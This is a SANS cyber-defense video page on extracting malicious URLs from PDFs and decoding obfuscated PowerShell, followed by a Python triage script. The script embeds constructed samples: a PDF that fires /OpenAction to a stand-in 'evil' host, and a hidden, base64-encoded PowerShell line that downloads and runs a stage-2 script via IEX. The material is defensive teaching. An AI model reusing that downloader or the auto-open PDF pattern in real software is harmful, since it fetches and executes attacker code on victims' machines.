12 Days of Defense - Day 1: PDF and Office Doc Malware IOC Extraction
John Hubbard
Looking to learn or improve your cyber defense skills? Want to know how to analyze network traffic, reverse engineer malware, triage phishing, analyze Windows or Linux logs and more? Thinking about starting a SOC analyst or blue team / IT security career? You’ve come to the right place! Hello! I’m John Hubbard and I’m a Sr. Instructor, course author, and curriculum lead for the Cyber Defense curriculum at the SANS Institute – the world’s most trusted source for cyber security training. I know how tough cyber security is to learn, and it’s an even tougher topic to stay up to date with! That’s why, on this channel, I break down complex cyber security concepts and make them clear and easy to understand. Effective cyber security training is my passion and my job, and through my videos, I hope to help you learn what you need to protect yourself and your organization from cyber-attacks. Twitter: @SecHubb In-person teaching schedule: https://www.sans.org/profiles/john-hubbard/
Video Description
In this video I show how to extract a malicious URL from a PDF without opening it, how to spot a weaponized Office document, and a method to quickly de-obfuscate PowerShell. Enjoy!

Links:
- REMnux: https://www.remnux.org
- PDF: https://app.any.run/tasks/0bf96bc2-041b-4918-9440-4fce9b160ae7/#
- Macro-enabled doc: https://hybrid-analysis.com/sample/0aee2350aab11b452b864426d7e7f5735b06ed55c09429f0e0ab38015b8771ee?environmentId=100

===

My SANS Courses:
- SEC450 - Blue Team Fundamentals: https://sans.org/sec450
- MGT551 - Building and Leading Security Operations Centers: https://sans.org/mgt551

PDF Guide to Security Operations: https://www.sans.org/security-resources/posters/cyber-defense/guide-security-operations-260
Blueprint Podcast: https://sans.org/blueprint-podcast
Twitter: https://twitter.com/SecHubb
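The two "without opening it" steps the video covers, pulling a URL out of a PDF and recovering a PowerShell command from its -EncodedCommand blob, as an added worked example that is not code from the video or from REMnux. It reproduces the static approach that pdfid/pdf-parser take: inflate FlateDecode streams, un-escape hex-encoded names (/#55RI is /URI), then count the keywords that make a PDF act on open (/OpenAction, /AA, /JavaScript, /Launch ...) and harvest URLs. The PDF and the command line are constructed for this example; the .invalid domains are placeholders, not indicators from the samples linked above.

```python
import base64
import re
import zlib
from typing import Dict, List, Optional

# Constructed sample, not a real malware file: a tiny hand-written PDF whose
# catalog has an /OpenAction (fires when the file is opened) and whose URLs are
# hidden the two ways a naive `strings` pass misses: a hex-escaped name
# (/#55RI == /URI) and a FlateDecode-compressed stream.
_STREAM_BODY = b"<< /S /URI /URI (http://payload.example.invalid/inv.exe) >>"
_COMPRESSED = zlib.compress(_STREAM_BODY)
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n"
    b"4 0 obj << /S /#55RI /#55RI (http://evil.example.invalid/login.php) >> endobj\n"
    b"5 0 obj << /Length " + str(len(_COMPRESSED)).encode() + b" /Filter /FlateDecode >>\n"
    b"stream\n" + _COMPRESSED + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

URL_RE = re.compile(rb"(?:https?|ftp)://[^\s()<>\"']+", re.I)
# Names pdfid counts because they let a PDF run code or reach out on open.
SUSPICIOUS_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS",
                    b"/Launch", b"/EmbeddedFile", b"/RichMedia", b"/URI"]


def normalize_names(data: bytes) -> bytes:
    """Resolve #XX hex escapes inside PDF names (e.g. /#55RI -> /URI)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> List[bytes]:
    """Return the decompressed body of every stream zlib can inflate."""
    bodies = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-encoded, or truncated: skip it
    return bodies


def extract_urls(text: bytes) -> List[str]:
    return sorted({u.decode("latin-1") for u in URL_RE.findall(text)})


def extract_pdf_iocs(data: bytes) -> Dict[str, object]:
    """Static triage: URLs plus keyword counts, without rendering the file."""
    # Inflate from the raw bytes first; un-escaping names before inflation
    # would corrupt compressed data that happens to contain '#xx'.
    views = [data] + inflate_streams(data)
    text = b"\n".join(normalize_names(v) for v in views)
    keywords = {}
    for name in SUSPICIOUS_NAMES:
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z])", text))
        if n:
            keywords[name.decode()] = n
    return {"urls": extract_urls(text), "keywords": keywords}


# Constructed sample: a downloader of the kind a macro hands to
# powershell -w hidden -enc <base64>. The base64 wraps UTF-16LE, not ASCII.
_SCRIPT = ("$u='http://evil.example.invalid/stage2.ps1';"
           "IEX (New-Object Net.WebClient).DownloadString($u)")
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -Enc "
                  + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode())


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (or any prefix: -e, -enc, ...)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        flag = tok[1:].lower()
        if flag.startswith("e") and "encodedcommand".startswith(flag):
            b64 = tokens[i + 1]
            b64 += "=" * (-len(b64) % 4)  # restore padding some loaders strip
            return base64.b64decode(b64).decode("utf-16-le", errors="replace")
    return None


if __name__ == "__main__":
    print(extract_pdf_iocs(SAMPLE_PDF))
    decoded = decode_encoded_powershell(SAMPLE_CMDLINE)
    print(decoded)
    print(extract_urls(decoded.encode()))
```

On REMnux the same checks are what `pdfid.py` and `pdf-parser.py --search URI` give you; for the macro-enabled document, `olevba` from oletools is the equivalent first step, and the decoded PowerShell is then fed back through `extract_urls` so the stage-2 URL lands in the same IOC list as the PDF's.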